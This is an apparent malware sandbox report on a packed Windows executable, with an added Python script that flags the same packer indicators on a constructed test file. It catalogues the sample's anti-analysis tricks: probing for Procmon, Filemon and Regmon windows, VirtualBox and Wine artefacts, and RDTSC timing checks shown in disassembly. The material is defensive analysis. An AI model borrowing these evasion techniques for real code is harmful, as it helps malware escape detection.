                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Section loaded: ondemandconnroutehelper.dll
                Source: FBmz85HS0d.exe | Static file information: File size 2931712 > 1048576
                Source: FBmz85HS0d.exe | Static PE information: Raw size of avozcotg is bigger than: 0x100000 < 0x2a3c00

                Data Obfuscation

                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Unpacked PE file: 0.2.FBmz85HS0d.exe.2a0000.0.unpack :EW;.rsrc :W;.idata :W;avozcotg:EW;rwvgytwe:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;avozcotg:EW;rwvgytwe:EW;.taggant:EW;
                Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                Source: FBmz85HS0d.exe | Static PE information: real checksum: 0x2d7e33 should be: 0x2cfaf9
                Source: FBmz85HS0d.exe | Static PE information: section name:
                Source: FBmz85HS0d.exe | Static PE information: section name: .rsrc
                Source: FBmz85HS0d.exe | Static PE information: section name: .idata
                Source: FBmz85HS0d.exe | Static PE information: section name: avozcotg
                Source: FBmz85HS0d.exe | Static PE information: section name: rwvgytwe
                Source: FBmz85HS0d.exe | Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Code function: 0_3_012289AB push ecx; iretd 0_3_012289B9
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Code function: 0_3_01226A97 push ds; retf 0_3_01226A98
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Code function: 0_3_012289AB push ecx; iretd 0_3_012289B9
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Code function: 0_3_01226A97 push ds; retf 0_3_01226A98
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Code function: 0_3_0126EC51 push ebp; iretd 0_3_0126F0C8
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Code function: 0_3_0120C33C push 480120C3h; ret 0_3_0120C35D
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Code function: 0_3_0590499C push esi; retf 0_3_0590499F
                Source: FBmz85HS0d.exe | Static PE information: section name: entropy: 7.9798629308220566
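
                The static indicators in this block are what packer triage keys on before any dynamic run: a first section whose name is empty or unprintable, two random eight-letter section names (avozc otg and rwvgytwe, written as one word each in the table above), a section with entropy 7.98 out of a possible 8, an entry point in the last section (.taggant) rather than in .text, sections that are writable and executable at the same time, and a stored checksum that does not match the file. The script below is an added example, not Joe Sandbox output or the report's tooling, that checks a PE for each of these using only the Python standard library. Because the analysed sample itself is not reproduced here, build_sample_pe() constructs a small PE32 with the same section layout and the section rights shown in the unpack line; its section sizes, the filler bytes and the chosen entropy threshold of 7.5 are assumptions of the example.

```python
"""Static PE triage for the packer indicators this report lists. Added example,
not Joe Sandbox output; standard library only, no pefile dependency."""
import hashlib
import math
import struct
from collections import Counter

SCN_CODE, SCN_INIT_DATA, SCN_EXEC, SCN_READ, SCN_WRITE = 0x20, 0x40, 0x20000000, 0x40000000, 0x80000000
CONVENTIONAL = {".text", ".data", ".rdata", ".bss", ".idata", ".edata", ".rsrc", ".reloc", ".pdata", ".tls"}


def shannon_entropy(data):
    """Bits per byte: 8.0 is incompressible; packed or encrypted sections sit near it."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_checksum(data):
    """Checksum as imagehlp computes it: carry-folded dword sum skipping the CheckSum
    field itself, folded to 16 bits, plus the file length."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    skip = (e_lfanew + 24 + 64) // 4             # dword index of OptionalHeader.CheckSum
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for i in range(len(padded) // 4):
        if i == skip:
            continue
        total += struct.unpack_from("<I", padded, i * 4)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def parse_pe(data):
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    nsec, opt_size = struct.unpack_from("<H", data, e_lfanew + 6)[0], struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt, sections = e_lfanew + 24, []
    for i in range(nsec):
        off = opt + opt_size + 40 * i            # section table follows the optional header
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        sections.append({"name": name.rstrip(b"\0"), "va": va, "vsize": vsize,
                         "raw": data[rawptr:rawptr + rawsize],
                         "chars": struct.unpack_from("<I", data, off + 36)[0]})
    return {"entry_rva": struct.unpack_from("<I", data, opt + 16)[0],
            "stored_checksum": struct.unpack_from("<I", data, opt + 64)[0],
            "sections": sections}


def triage(data):
    """Findings as (kind, ...) tuples, one per indicator the report's static checks raise."""
    pe, findings, ep_section = parse_pe(data), [], None
    for s in pe["sections"]:
        raw = s["name"]
        clean = all(0x21 <= b < 0x7F for b in raw)
        label = raw.decode("ascii") if clean else repr(raw)
        if not raw or not clean:
            findings.append(("special_section_name", raw))
        elif label not in CONVENTIONAL:
            findings.append(("nonstandard_section_name", label))
        entropy = shannon_entropy(s["raw"])
        if entropy > 7.5:
            findings.append(("high_entropy_section", label, round(entropy, 3)))
        if s["chars"] & SCN_EXEC and s["chars"] & SCN_WRITE:
            findings.append(("writable_executable_section", label))
        if s["va"] <= pe["entry_rva"] < s["va"] + max(s["vsize"], len(s["raw"])):
            ep_section = label
    findings.append(("entry_point_section", ep_section))
    computed = pe_checksum(data)
    if pe["stored_checksum"] != computed:
        findings.append(("checksum_mismatch", pe["stored_checksum"], computed))
    return findings


def build_sample_pe(fix_checksum=False):
    """Constructed PE32, not the analysed sample. Each body is a multiple of
    FileAlignment (0x200) and at most SectionAlignment (0x1000), so RVAs advance one page."""
    names = [b"", b".rsrc", b".idata", b"avozcotg", b"rwvgytwe", b".taggant"]
    blob = b"".join(hashlib.sha512(bytes([i])).digest() for i in range(64))  # deterministic, near-8-bit entropy
    bodies = [b"\0" * 0x200, b"RSRC" * 0x80, b"\0" * 0x200, blob, b"\x90" * 0x200, b"\xE9" + b"\0" * 0x1FF]
    rwx, rw = SCN_CODE | SCN_EXEC | SCN_READ | SCN_WRITE, SCN_INIT_DATA | SCN_READ | SCN_WRITE
    hdr_size, sec_hdrs, raw_ptr, va, entry_rva = 0x400, b"", 0x400, 0x1000, 0
    for name, body in zip(names, bodies):
        chars = rw if name in (b".rsrc", b".idata") else rwx   # rights as in the unpack line
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name, len(body), va, len(body), raw_ptr, 0, 0, 0, 0, chars)
        if name == b".taggant":
            entry_rva = va                        # entry point in the last section, as reported
        raw_ptr, va = raw_ptr + len(body), va + 0x1000
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(names), 0, 0, 0, 0xE0, 0x0102)
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      0x10B, 14, 0, 0, 0, 0, entry_rva, 0x1000, 0x2000, 0x400000, 0x1000, 0x200,
                      6, 0, 0, 0, 6, 0, 0, va, hdr_size, 0, 2, 0,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b"\0" * 128
    headers = dos + coff + opt + sec_hdrs
    image = headers + b"\0" * (hdr_size - len(headers)) + b"".join(bodies)
    if fix_checksum:                              # CheckSum sits at e_lfanew + 24 + 64 = 0x98
        image = image[:0x98] + struct.pack("<I", pe_checksum(image)) + image[0x9C:]
    return image
```

                Calling triage(build_sample_pe()) reports a special_section_name finding for the nameless section, nonstandard_section_name for avozcotg, rwvgytwe and .taggant, high_entropy_section for avozcotg only, writable_executable_section for the four RWX sections, entry_point_section .taggant, and a checksum_mismatch because the constructed header stores 0; build_sample_pe(fix_checksum=True) writes the computed value back and the mismatch disappears. To run the same checks on a real file, pass its bytes to triage(). The checksum check is only a consistency signal: a zero or stale checksum is common in legitimate unsigned builds, but a nonzero value that disagrees with the file, as in this sample, usually means the image was rewritten after linking.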

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 477976 second address: 47797E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 476AD6 second address: 476AFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C79895h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jmp 00007F4EF0C7988Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 476F69 second address: 476F87 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F4EF0C09E28h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 479A2A second address: 479A7E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007F4EF0C79886h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jng 00007F4EF0C79890h 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 js 00007F4EF0C79886h 0x0000001c popad 0x0000001d nop 0x0000001e call 00007F4EF0C79892h 0x00000023 jnl 00007F4EF0C7988Ch 0x00000029 pop edi 0x0000002a push 00000000h 0x0000002c sbb esi, 47B7C1D3h 0x00000032 push 8E6FBD3Fh 0x00000037 jnc 00007F4EF0C79894h 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 479A7E second address: 479A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 479A82 second address: 479B4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 71904341h 0x0000000d push esi 0x0000000e mov edi, 695DA656h 0x00000013 pop edx 0x00000014 push 00000003h 0x00000016 call 00007F4EF0C79894h 0x0000001b pushad 0x0000001c adc dx, 5CA7h 0x00000021 xor ebx, 540CD5E1h 0x00000027 popad 0x00000028 pop edi 0x00000029 push 00000000h 0x0000002b pushad 0x0000002c jmp 00007F4EF0C79896h 0x00000031 popad 0x00000032 push 00000003h 0x00000034 mov di, 2CABh 0x00000038 call 00007F4EF0C79889h 0x0000003d jg 00007F4EF0C79892h 0x00000043 jng 00007F4EF0C7988Ch 0x00000049 push eax 0x0000004a jnl 00007F4EF0C79899h 0x00000050 jmp 00007F4EF0C79893h 0x00000055 mov eax, dword ptr [esp+04h] 0x00000059 jne 00007F4EF0C798A5h 0x0000005f mov eax, dword ptr [eax] 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F4EF0C7988Fh 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 479B4B second address: 479BC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jnl 00007F4EF0C09E16h 0x00000015 jnl 00007F4EF0C09E16h 0x0000001b popad 0x0000001c jne 00007F4EF0C09E1Ch 0x00000022 popad 0x00000023 pop eax 0x00000024 push 00000000h 0x00000026 push esi 0x00000027 call 00007F4EF0C09E18h 0x0000002c pop esi 0x0000002d mov dword ptr [esp+04h], esi 0x00000031 add dword ptr [esp+04h], 00000019h 0x00000039 inc esi 0x0000003a push esi 0x0000003b ret 0x0000003c pop esi 0x0000003d ret 0x0000003e add dword ptr [ebp+122D2B2Bh], edx 0x00000044 lea ebx, dword ptr [ebp+124558DCh] 0x0000004a mov dword ptr [ebp+122D1D54h], edi 0x00000050 xchg eax, ebx 0x00000051 pushad 0x00000052 jmp 00007F4EF0C09E1Bh 0x00000057 pushad 0x00000058 pushad 0x00000059 popad 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 479E59 second address: 479E5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 479E5D second address: 479E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 49A917 second address: 49A953 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C7988Fh 0x00000007 push esi 0x00000008 jnl 00007F4EF0C79886h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jbe 00007F4EF0C79886h 0x0000001b jmp 00007F4EF0C79897h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 49A953 second address: 49A969 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F4EF0C09E16h 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F4EF0C09E16h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 463899 second address: 46389D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 498A3F second address: 498A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 498A46 second address: 498A66 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F4EF0C798CAh 0x0000000e jmp 00007F4EF0C7988Fh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 498A66 second address: 498A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 498BC9 second address: 498BE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C79898h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 498EAD second address: 498EB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 499044 second address: 499048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 499048 second address: 499075 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jbe 00007F4EF0C09E16h 0x00000010 jmp 00007F4EF0C09E20h 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 499075 second address: 499079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 499079 second address: 49907D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4991C9 second address: 4991DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F4EF0C7988Ch 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4991DD second address: 4991E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 499463 second address: 49947C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4EF0C7988Fh 0x00000009 jp 00007F4EF0C79886h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4995CB second address: 4995CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 49972A second address: 499747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F4EF0C7988Ch 0x0000000a jmp 00007F4EF0C7988Ah 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 499747 second address: 49974D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 49974D second address: 49978F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4EF0C7988Ch 0x00000009 jc 00007F4EF0C79886h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007F4EF0C7989Ah 0x00000019 ja 00007F4EF0C7988Eh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 49978F second address: 499795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 499795 second address: 49979F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4EF0C79886h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4998FB second address: 49990C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jc 00007F4EF0C09E16h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 49990C second address: 499944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4EF0C79890h 0x0000000d jne 00007F4EF0C798A0h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007F4EF0C79898h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 499944 second address: 49994A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 48DEEE second address: 48DEF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 48DEF2 second address: 48DEF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 48DEF8 second address: 48DF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F4EF0C79888h 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F4EF0C79893h 0x00000016 pop edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 46F34F second address: 46F363 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E20h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 46F363 second address: 46F395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jnl 00007F4EF0C79886h 0x0000000f jmp 00007F4EF0C79897h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jne 00007F4EF0C79886h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 46F395 second address: 46F3BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4EF0C09E1Fh 0x00000009 jg 00007F4EF0C09E16h 0x0000000f popad 0x00000010 jmp 00007F4EF0C09E20h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 46F3BF second address: 46F3C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 499A90 second address: 499AE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E25h 0x00000007 jmp 00007F4EF0C09E27h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F4EF0C09E1Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F4EF0C09E1Dh 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 49A0C5 second address: 49A0E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4EF0C7988Bh 0x0000000b popad 0x0000000c jnl 00007F4EF0C79888h 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007F4EF0C79886h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 49A242 second address: 49A252 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 49A3D7 second address: 49A3E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F4EF0C79886h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 466D8C second address: 466DB3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4EF0C09E1Ch 0x00000008 pushad 0x00000009 jo 00007F4EF0C09E16h 0x0000000f jl 00007F4EF0C09E16h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pushad 0x0000001c popad 0x0000001d pop ebx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 466DB3 second address: 466DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 466DB9 second address: 466DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4EF0C09E25h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4A2A80 second address: 4A2A9A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4EF0C7988Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F4EF0C79886h 0x00000014 rdtsc
